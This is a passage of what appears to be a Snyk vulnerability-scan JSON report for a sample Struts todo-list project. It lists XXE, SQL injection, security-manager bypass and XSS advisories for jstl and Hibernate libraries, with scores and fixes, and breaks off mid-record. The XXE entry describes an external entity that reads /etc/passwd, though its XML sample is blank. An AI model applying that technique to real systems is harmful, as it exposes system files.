collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 